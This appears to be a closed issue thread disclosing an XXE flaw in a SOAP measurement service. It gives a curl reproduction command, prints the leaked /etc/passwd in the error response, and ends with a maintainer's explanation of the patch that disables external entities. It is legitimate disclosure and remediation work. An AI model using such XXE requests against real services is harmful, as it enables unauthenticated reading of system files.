Closed bored-engineer closed 8 years ago
You can test this issue by downloading this file: oppd.xml
Then running the following command will return the contents of /etc/passwd inside the SOAP error response:
# curl -X POST http://172.16.240.138:8090/ -d @oppd.xml
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body><nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type="ErrorResponse"> <nmwg:data> root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
nagios:x:499:499::/var/spool/nagios:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rtkit:x:498:498:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
cassandra:x:497:497::/usr/share/cassandra:/bin/bash
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
owamp:x:496:496::/tmp:/bin/nologin
bwctl:x:495:495::/tmp:/bin/nologin
perfsonar:x:494:500:perfSONAR User:/tmp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
saslauth:x:493:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
memcached:x:492:494:Memcached daemon:/var/run/memcached:/sbin/nologin
esmond:x:491:501:Esmond User:/tmp:/sbin/nologin
pulse:x:490:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
admin:x:500:504::/home/admin:/bin/bash
sudo:x:501:505::/home/sudo:/bin/bash
</nmwg:data> <nmwg:metadata id="return_message"><nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType></nmwg:metadata><nmwg:data metadataIdRef="return_message" id="data_return_message"><nmwgr:datum>Unknown messagetype: </nmwgr:datum></nmwg:data></nmwg:message></SOAP-ENV:Body></SOAP-ENV:Envelope>
Thanks for this report!
By default, LibXML loads external entities, which allows an unauthenticated arbitrary file read from the system via XXE (XML External Entity injection).
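This patch disables external entity processing by creating an `ext_ent_handler` that returns an empty string, so an external entity reference in a request expands to nothing instead of the contents of the referenced file. Re-sending the request above against a patched service is a quick way to confirm that the response no longer contains file contents.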